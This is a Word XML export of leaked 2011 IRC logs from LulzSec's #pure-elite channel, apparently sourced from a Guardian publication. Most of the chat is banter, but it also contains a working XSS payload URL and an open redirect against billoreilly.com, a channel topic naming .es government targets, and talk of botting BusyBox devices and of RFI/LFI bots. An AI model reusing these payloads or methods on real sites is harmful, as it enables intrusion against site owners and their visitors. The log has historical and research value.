        <w:t>* * ** ENDING LOGGING AT Sat Jun 4 18:16:49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Sat Jun 4 18:17:02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18:17:02 * Now talking on #pure-elite Jun 04 18:17:02 * Topic for #pure-elite is: pE | Research and exploit development | Coding, designing, penetrating, packeting, laughing at our crippled opponents Jun 04 18:17:02 * Topic for #pure-elite set by Topiary!t@HA- p22.rkn.75e5ku.IP at Fri Jun 3 17:06:56 2011 Jun 04 18:18:00 * neuron listens to wub wub wub Jun 04 18:18:04 lol i dont understand this open letter wht is it trying to say? Jun 04 18:18:06 lol :o Jun 04 18:18:21 joepie91 I'll talk to jaromil Jun 04 18:18:33 joepie91 he seems to not get a few things Jun 04 18:18:34 joepie91 &gt;.&gt; Jun 04 18:18:40 trollpoll is out of context Jun 04 18:19:20 joepie91 I get his point Jun 04 18:19:21 joepie91 however Jun 04 18:19:34 joepie91 With its dramatic announcement Jun 04 18:19:34 joepie91 the LoU played into the hands of policy makers who want complete Jun 04 18:19:34 joepie91 control over the Internet and are looking for reasons to seize it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:20:00 joepie91 that is the same argument as "by taking down shit you only give them more reason to crack down" Jun 04 18:20:12 joepie91 which is, imo, plain bullshit Jun 04 18:20:41 lol i think stuxnet proved the internet is not needed to engage in cyber war Jun 04 18:20:58 trollpoll I love this ending "Now we are all sons of bitches" Jun 04 18:21:07 trollpoll is epic Jun 04 18:22:00 &lt;io&gt; also, they do already have laws against hacking. all they do is whine now.. and what's ther bigges action? they call it now war. or terrorism even, whatever.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:22:05 &lt;io&gt; it doesn't help them with their problem Jun 04 18:22:18 &lt;io&gt; that worked in afghanistan or iraq cause they needed legitimation to raid Jun 04 18:22:24 &lt;io&gt; but wat now? invade the internet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:22:42 &lt;io&gt; and they cant restrict it the way they would like to Jun 04 18:22:46 &lt;io&gt; ecomomics would crash Jun 04 18:22:52 trollpoll thats the term "invade", all of us, thinks that internet is a real independent state Jun 04 18:22:57 trollpoll (all of us?) Jun 04 18:23:21 trollpoll so, any state invaded will try to defense Jun 04 18:23:30 trollpoll and obviously, counter attack Jun 04 18:23:41 &lt;io&gt; yup, internet is very similar to a sate Jun 04 18:23:56 &lt;io&gt; it state* Jun 04 18:24:00 &lt;io&gt; gah.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:24:19 trollpoll of course they started the war, trying to politice internet, and trying to impose their law Jun 04 18:24:54 joepie91 ya Jun 04 18:25:06 joepie91 it would be funny if it weren't so sad Jun 04 18:25:16 joepie91 to see how corporations are trying to "claim" the internet Jun 04 18:25:24 lol ok so has everyone left tht irc now?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:25:25 trollpoll yes Jun 04 18:25:25 joepie91 as if it's their exclusive distribution platform Jun 04 18:25:38 joepie91 it wasn't made this way for them in the first place, damnit Jun 04 18:26:05 trollpoll thats it, they are trying to convert internet in a "desktop app" with as many links as you can pay Jun 04 18:26:25 joepie91 ya Jun 04 18:26:38 joepie91 corporations should realize the internet isn't theirs Jun 04 18:26:44 joepie91 and I don't mean the physical tubes Jun 04 18:26:48 joepie91 but the actual internet Jun 04 18:26:51 joepie91 the community, idea, concept Jun 04 18:27:25 trollpoll yes, the utopie is to create a new internet... corporation free Jun 04 18:27:40 trollpoll using each one its infrastructures Jun 04 18:28:32 trollpoll or perhaps, a big corp like google inverting in infrastructures Jun 04 18:28:48 trollpoll inverting?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:28:51 trollpoll ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:30:00 joepie91 mye Jun 04 18:30:00 joepie91 also Jun 04 18:30:03 joepie91 what the fuck Jun 04 18:30:08 joepie91 what is with all these companies and orgs Jun 04 18:30:09 joepie91 going all Jun 04 18:30:14 joepie91 OMG WE NEED A NEW DESKTOP EXPERIENCE Jun 04 18:30:16 joepie91 first Unity Jun 04 18:30:17 joepie91 then GNOME3 Jun 04 18:30:20 joepie91 now Windows 8?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:30:24 joepie91 http://www.youtube.com/watch?v=8upI6M4T92U Jun 04 18:30:33 joepie91 this shit is as counterproductive as possibly can be, my god Jun 04 18:30:58 joepie91 it's the web 2.0 of the desktop OS -_- Jun 04 18:31:47 pwnsauce i used win8 leaked Jun 04 18:31:49 pwnsauce is very gay Jun 04 18:32:03 Topiary what the fuck is that, Kinect on steroids?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:32:06 trollpoll of course they want to convert a pc in an iphone Jun 04 18:32:19 Topiary seriously I'm mad at all this stupid waggle-your- arms-to-pet-tiger technology Jun 04 18:32:30 joepie91 ya Jun 04 18:32:38 joepie91 seriously Jun 04 18:32:40 joepie91 web 2.0 Jun 04 18:32:43 joepie91 now on your desktop OS Jun 04 18:32:44 * Topiary is a beast with the mouse/keyboard/gamepad Jun 04 18:32:50 joepie91 you know what's the worst?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:32:57 joepie91 linux was the goddamn first OS to have this stupid crap Jun 04 18:33:02 trollpoll ppl will love...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:33:04 joepie91 Unity, GNOME3...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:33:28 joepie91 trollpoll: people love anyting as long as the buzzword:crash ratio is above 1 Jun 04 18:33:35 joepie91 anything* Jun 04 18:33:54 trollpoll years ago i was talking about this, someone told me, web browsers are the SO of the future Jun 04 18:34:02 Topiary people love anything they can virtually drag their fat finger across, as long as it makes a contrail behind it in shiny effects Jun 04 18:34:28 storm i love porn Jun 04 18:34:45 neuron i agree with storm Jun 04 18:34:48 neuron he makes a valid poin Jun 04 18:35:04 lol lol :D Jun 04 18:35:04 trollpoll ok, i got it, stop talking about shit Jun 04 18:35:20 trollpoll everybody knows, internet is for pr0nnnn Jun 04 18:36:17 trollpoll (but after few years storm, you will have a unique destktop application called porn and you will pay for that) Jun 04 18:36:25 trollpoll xDD Jun 04 18:36:53 joepie91 po.rn Jun 04 18:37:16 lol ewww pron is disgusting :O Jun 04 18:37:19 lol xD Jun 04 18:37:53 pwnsauce joepie91 - reg that domain and fill it with shock videos xD Jun 04 18:38:18 joepie91 lol Jun 04 18:38:19 joepie91 also Jun 04 18:38:22 joepie91 I am going to take a stab Jun 04 18:38:31 joepie91 and say that Windows 8 uses Trident Jun 04 18:38:34 joepie91 to render the new touch UI shit Jun 04 18:38:38 joepie91 aka internet explorer Jun 04 18:38:46 joepie91 with only support for HTML5 and Silverlight Jun 04 18:38:51 joepie91 as well as .NET integration Jun 04 18:38:58 joepie91 that IE will thus be integrated deeply into the system Jun 04 18:38:59 trollpoll silverlight... who the fuck uses this shit? Jun 04 18:39:00 pwnsauce it supports vb6 binaries still Jun 04 18:39:03 joepie91 not only meaning you can't get rid of it Jun 04 18:39:05 pwnsauce we tested Jun 04 18:39:08 joepie91 but also meaning Jun 04 18:39:16 joepie91 that IE is yet again deeply integrated into the system Jun 04 18:39:20 joepie91 introducing a buttload of new vulnerabilities Jun 04 18:39:34 joepie91 let's see when the final release comes out, if the above is accurate.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:39:36 trollpoll good point Jun 04 18:39:43 joepie91 they did it before, wouldn't be surprised if they did it again.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:40:00 joepie91 remember windows 95/98(?) and the IE integraten? Jun 04 18:40:03 joepie91 integration* Jun 04 18:40:15 trollpoll microsoft has imrpoved their security very very well in tha last few years Jun 04 18:40:43 joepie91 yes, but a bit less bad doesn't make it good Jun 04 18:41:02 joepie91 if IE is gonna be this deeply integrated, I guarantee you that there will be shitloads of holes Jun 04 18:41:04 trollpoll but obviously, being the most used SO in the world, makes the cake bigger for researchers Jun 04 18:41:52 pwnsauce MORE CAKE!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Sat Jun 4 18:42:02 2011</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Observer 2011.06.24 20:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.guardian.co.uk/technology/2011/jun/24/lulzsec-irc-leak-the-full-record</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IRC leak: the full record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text of the chatroom logs of discussions between the hackers involved in LulzSec, aka Lulz Security, reveal the tensions inside the group Tweet this reddit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Arthur and Ryan Gallagher guardian.co.uk, Friday 24 June 2011 14.17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11:09:12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ENDING LOGGING AT Tue May 31 11:09:55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11:09:55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11:12:06 [redacted] http://www.billoreilly.com/pg/jsp/help/contactus.jsp?cid=1308195%3C%22%27;alert%28String.fromCharCode%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2888,83,83%29%29//\%27;alert%28String.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>fromCharCode%2888,83,83%29%29//%22; alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83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%29%29//--%3E%3C/SCRIPT% 3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E&amp;tid=401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11:12:37 [redacted] delivered :D May 31 11:18:50 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 11:18:57 Neuron o/ morning!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 11:19:30 [redacted] hello May 31 11:19:38 [redacted] XSS in billoreilly lol May 31 11:19:42 [redacted] http://www.billoreilly.com/pg/jsp/help/contactus.jsp?cid=1308195%3C%22%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;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alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29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//\%22;alert%28String.fromCharCode%2888,83,83%29%29//-- %3E%3C/SCRIPT%3E%22%3E%27 %3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E&amp;tid=401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11:19:50 [redacted] also a URL redirection May 31 11:19:51 [redacted] http://www.billoreilly.com/site/rd?satype=1&amp;said=313&amp;pos=11&amp;url=http://www.meatspin.com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11:20:31 Neuron lmfao May 31 11:20:39 Neuron wow you been bizzy May 31 11:21:54 Neuron what made you go after billoreilly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 11:22:59 joepie92 hai Neuron May 31 11:23:02 Neuron o/ May 31 11:23:54 [redacted] the lulz May 31 11:45:15 * Neuron yawns May 31 11:50:06 Avunit Get on the new IRCd; use your login @ http://46.243.12.9/docs/ to check how to!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 11:51:18 * Neuron rages my login info is on my other machine :( Avunit help a man out?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 11:51:28 Avunit lol May 31 11:51:31 Avunit ill reset your pass May 31 11:51:35 Avunit sinc ei cant obviously read it May 31 11:51:45 Neuron rgr thanks May 31 11:51:50 [redacted] Avunit May 31 11:51:54 Avunit yesh May 31 11:51:59 [redacted] nvm i still ahve my pass :D May 31 11:52:19 * Avunit has quit (SSL Connection closed) May 31 11:52:40 * Avunit (Avunit@HA-4o8.6s8.srgpum.IP) has joined #pure- elite May 31 11:52:48 Avunit what is this for sorcery D: May 31 11:52:55 Neuron XD May 31 11:53:04 * Avunit has quit (Changing host) May 31 11:53:04 * Avunit (Avunit@netadmin.operationfreedom.ru) has joined #pure-elite May 31 11:53:30 Avunit Anyway need to move asap, i only havent spoken to devrandom yet May 31 11:53:44 Neuron Avunit: cap_sasl.pl 404 May 31 11:53:59 Avunit wut May 31 11:53:59 Avunit sec May 31 11:55:55 Avunit oh i know xD May 31 11:56:48 [redacted] brb May 31 11:56:54 Python interface unloaded * * ** ENDING LOGGING AT Tue May 31 11:56:54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11:58:25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11:58:25 * Now talking on #pure-elite May 31 11:58:25 * Topic for #pure-elite is: [pE] security research and development. | PRIV8!PRIV8!PRIV8! No leaks, no vanity. Everything stays here. | work with trollpoll on .es targets. MSG him for infos. google search site:gob.es for fun May 31 11:58:25 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Wed May 25 16:25:57 2011 May 31 11:59:09 Neuron Avunit: :( don't like us irssi guys ;( May 31 11:59:14 Avunit LOL May 31 11:59:16 Avunit sowwie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12:00:54 Avunit fixd gimme a sec May 31 12:01:47 Neuron rgr May 31 12:02:16 Avunit there you go May 31 12:03:17 Avunit lighttpd thought you wanted to execute a .pl script May 31 12:03:22 Avunit and was like OH NO YOU DIDNT May 31 12:03:45 Neuron XD May 31 12:04:24 Avunit so chagned it to .txt :P just save and rename it to cap_sasl.pl May 31 12:05:50 Neuron brb May 31 12:05:53 * Neuron has quit (Quit: leaving) May 31 12:06:32 * Avunit has changed the topic to: Get on the new IRCd; use your login @ http://46.243.12.9/docs/ to check how to!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 12:07:01 * Avunit has changed the topic to: Get on the new IRCd; use your login @ http://46.243.12.9/docs/ to check how to! /join #pure-elite on the new IRCd!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 12:08:09 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 12:08:18 Neuron irss = /sasl command not find May 31 12:08:52 Avunit eek May 31 12:09:00 Avunit did you load the script?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 12:09:18 Neuron let me try again May 31 12:09:23 * Neuron has quit (Quit: leaving) May 31 12:26:36 * Neuron_ (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 12:26:42 &lt;neuron_&gt; Avunit: your script hates backtrack :P May 31 12:26:56 Avunit not miens D: May 31 12:27:02 * Topiary has quit (Quit: restarting client) May 31 12:27:47 &lt;neuron_&gt; brb thrid try May 31 12:27:54 * Neuron_ has quit (Quit: leaving) May 31 12:28:04 * Topiary (t@HA-581.fpm.h7vc0g.IP) has joined #pure-elite May 31 12:50:18 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 12:50:22 Neuron ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 12:50:26 Avunit neuron May 31 12:50:29 Neuron giving me connection refused May 31 12:50:31 Avunit http://pthree.org/2010/01/31/freenode-ssl-and-sasl- authentication-with-irssi/ May 31 12:50:41 Avunit that means you didnt use the right port or didnt SASL auth May 31 12:51:04 Neuron rgr May 31 12:52:17 Topiary 9001 or 9002 May 31 12:52:29 Avunit 1 = ssl, 2 = NO SSL BIATCH May 31 12:53:10 * Neuron has quit (Quit: leaving)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13:03:05 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 13:03:26 Neuron Avunit: lol really quick which password the one you just gave me or the oone for nickserv here.. both hate me equally May 31 13:03:30 Neuron :) May 31 13:03:41 Avunit the one ig ave you May 31 13:03:51 Neuron capital N on Neuron or lowercase/ May 31 13:03:54 Avunit capital May 31 13:04:41 Neuron back to fighting with it :) May 31 13:07:43 Neuron im sure its because im doing something stupid May 31 13:07:46 * Neuron has quit (Quit: leaving) May 31 13:15:00 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure- elite May 31 13:15:30 Neuron Avunit: wanna know what the problem was XD i was naming my network PE in my config....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 13:15:53 Topiary happened to me first time May 31 13:16:03 Topiary I auth'd to shipyard but named my net freedomsasl May 31 13:21:27 Neuron ok was hoping iw asn't the only one :E May 31 15:00:16 storm yo May 31 15:17:39 * Disconnected (Remote host closed socket).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Tue May 31 15:17:39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Tue May 31 23:51:53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31 23:51:53 * Now talking on #pure-elite May 31 23:51:53 * Topic for #pure-elite is: PRIV8. NO LEAKS. RESPECT EACH OTHER. RESEARCH AND EXPLOIT DEV!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 23:51:53 * Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Tue May 31 18:48:23 2011 May 31 23:52:05 Neuron o/ hey [redacted] May 31 23:52:09 [redacted] hello May 31 23:52:11 [redacted] did i miss anything?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>May 31 23:52:16 Neuron nothing really May 31 23:52:21 [redacted] lot of news coverage May 31 23:52:32 Neuron just me and kayla trying to bot 38k or so busybox's you? May 31 23:53:44 [redacted] XD May 31 23:53:46 [redacted] nothing at all May 31 23:53:49 [redacted] that sounds nice May 31 23:54:18 Neuron the most i can do is make a bash script that acts has a irc client and we can issue commands that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01:04:47 * value has quit (Connection closed) Jun 01 01:19:35 * value (value@HA-ao3.bsr.r1bp4m.IP) has joined #pure-elite Jun 01 01:28:38 * Topiary (t@HA-r9b.fpm.h7vc0g.IP) has joined #pure-elite Jun 01 01:29:53 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 01:32:26 * Neuron (Neuron@HA-l0q.345.a84vd3.IP) has joined #pure- elite Jun 01 01:39:34 Recursion http://i.imgur.com/DsgWI.jpg Jun 01 01:40:10 Topiary Ooh that's a much better screencap Jun 01 01:40:14 Topiary the one I had earlier was lame Jun 01 01:40:18 Topiary oh man it includes the twitter Jun 01 01:40:29 Topiary fucking Wall Street Journal printed a twitter name Jun 01 01:40:32 Topiary and a fucking cat in space Jun 01 01:40:40 Neuron XD Jun 01 01:41:12 Neuron thats epic Jun 01 01:56:12 joepie92 http://www.nasa.gov/multimedia/nasatv/index.html Jun 01 01:56:29 joepie92 supposedly a shuttle is going to land Jun 01 01:56:31 joepie92 or some shit Jun 01 01:57:07 storm hi Jun 01 01:57:41 Neuron lol Jun 01 01:57:43 Neuron watching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02:13:02 * Topiary has quit (Ping timeout: 121 seconds) Jun 01 02:14:08 * Topiary (t@HA-cin.fpm.h7vc0g.IP) has joined #pure-elite Jun 01 02:18:29 Topiary anything exciting on Nasa?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:19:02 storm hi Topiary Jun 01 02:19:06 Topiary hey storm Jun 01 02:19:20 storm sup Jun 01 02:19:45 Topiary just woke up, anything exciting happening with you? Jun 01 02:19:53 storm yeah i just ate bbq Jun 01 02:19:54 storm :D Jun 01 02:20:10 storm and i just woke up as well Jun 01 02:20:26 * Neuron has quit (Quit: leaving) Jun 01 02:20:38 Topiary BBQ for breakfast, mmm Jun 01 02:22:06 storm yessir Jun 01 02:22:14 storm especially at 222am Jun 01 02:22:17 storm xD Jun 01 02:23:42 * lol (lol@HA-r3c.ts4.h3kc47.IP) has joined #pure-elite Jun 01 02:23:48 lol hey guys :) Jun 01 02:25:16 Topiary hi kayla Jun 01 02:25:30 storm ah Jun 01 02:25:32 storm so lol is kayla Jun 01 02:25:35 storm makes sense Jun 01 02:25:36 storm ;x Jun 01 02:26:01 lol :D Jun 01 02:26:03 storm i should have known with all those faces Jun 01 02:26:27 lol lmao Jun 01 02:26:30 lol how goes :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:26:34 storm lols Jun 01 02:26:36 storm fine Jun 01 02:26:46 storm still looking for an rfi/lfi bot :p Jun 01 02:28:30 lol i've got one lol :D with google bypass, if the bypass still works xD Jun 01 02:28:52 lol but it's on a USB but i think the USB might be infected xD Jun 01 02:29:04 lol so im scared to plug it in xD Jun 01 02:31:02 * Topiary has quit (Ping timeout: 121 seconds) Jun 01 02:31:49 storm lol Jun 01 02:31:57 storm get off windows and nothing is ever infected! Jun 01 02:33:55 joepie92 it r landing nao Jun 01 02:33:56 joepie92 I believe Jun 01 02:34:02 joepie92 http://www.ustream.tv/nasahdtv Jun 01 02:34:04 joepie92 :P Jun 01 02:34:30 joepie92 also, storm, kayla is rather recognizable :P Jun 01 02:36:39 storm orly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:36:49 joepie92 yarly Jun 01 02:37:06 joepie92 I recall one line from lol being quoted Jun 01 02:37:12 joepie92 and I was liek ohey dats kayla Jun 01 02:37:13 joepie92 lol Jun 01 02:38:21 joepie92 also Jun 01 02:38:27 joepie92 landed spaceshuttle has landed Jun 01 02:38:28 joepie92 :P Jun 01 02:38:31 * Topiary (t@HA-tic.fpm.h7vc0g.IP) has joined #pure-elite Jun 01 02:38:50 Topiary hey storm, did you shit on 2600 again earlier? Jun 01 02:39:26 lol apparnently they want more :o Jun 01 02:39:27 lol :D Jun 01 02:39:36 Topiary more you say Jun 01 02:43:12 lol moooooooooooooooooooooooooooooooooooooooooooore Jun 01 02:43:23 Topiary my connection is being a dick Jun 01 02:43:26 Topiary I think it's the weather Jun 01 02:43:48 storm yesh Jun 01 02:43:50 storm i did Jun 01 02:43:53 storm wy?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 02:43:55 storm why?* Jun 01 02:44:14 storm i brought madjack down to like 17 users or something Jun 01 02:44:25 lol lol Jun 01 02:44:34 storm as well as collective Jun 01 02:44:39 storm ;P Jun 01 02:45:05 Topiary heh they mad Jun 01 02:45:56 storm howso Jun 01 02:46:13 Topiary well Overlord Mighty Jester himself was tweeting at us Jun 01 02:46:16 Topiary calling us failures :( Jun 01 02:46:28 lol lol Jun 01 02:47:10 storm lmfao Jun 01 02:47:13 storm where Jun 01 02:47:16 storm link a nig Jun 01 02:48:00 lol https://twitter.com/#!/th3j35t3r Jun 01 02:48:04 Topiary Jun 01 02:48:05 lol tht is t35t3r Jun 01 02:48:18 lol tbh he needs owning :D Jun 01 02:48:26 Topiary he's needed owning for a long time indeed Jun 01 02:48:38 Topiary you gotta love it though Jun 01 02:48:49 Topiary his little fortress with his minions, his DoS tool and his blog Jun 01 02:48:54 Topiary his world must be so small Jun 01 02:49:03 storm @anonakomis, @lulzsec, whatever, whoever. I AM BUSY. So how bout ya fuck off? Show some grace at least. R WE DONE YET?</w:t>
